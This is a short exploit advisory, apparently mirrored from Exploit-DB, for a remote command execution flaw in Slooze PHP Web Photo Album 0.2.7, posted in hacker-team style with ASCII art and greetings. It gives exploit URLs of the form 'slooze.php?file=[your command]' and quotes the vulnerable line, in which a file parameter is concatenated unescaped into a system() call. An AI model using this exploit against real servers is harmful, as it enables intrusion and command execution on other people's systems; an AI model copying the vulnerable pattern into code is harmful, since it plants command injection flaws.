Slooze PHP Web Photo Album 0.2.7 – Command Execution - 体验盒子

作者： Sn!pEr.S!Te Hacker

日期： 2010-05-05

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12515/

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
 0 _ __ __ __ 1 
 1 /' \__/'__`\/\ \__/'__`\ 0 
 0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1 
 1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0 
 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 
 1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 
 0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1 
 1\ \____/ >>Remote Command Execution Vulnerability 0 
 0 \/___/ 1 
 11 
 0 0 
 11 
 00 
 1########################################1 
 0 Sn!pEr Team1 
 1########################################0 
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
(slooze.php) Command Execution Vulnerability

 #[+] Author : Sn!pEr.S!Te hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker#

#[+] Site: www.v4-team.com/ccand www.sa-hacker.com 
# [+] 5-5-2010 #
# [+] Script : slooze-0.2.7 #
# [+] Download: http://sourceforge.net/projects/slooze/files/slooze/0.2.7/slooze-0.2.7.zip/download #
# Version: [0.2.7] #
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
Exploit :src/slooze.php
http://localhost/src/slooze.php?file= [your command]


http://127.0.0.1/src/slooz.php?file=[your command]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#

system('del "' . $this->cachePath . $file . '"'); /* Windows platforms */

line :1003

 

myfriend : liar -ysefe - Dj - sm hacker-baby hacker-dmar Hacker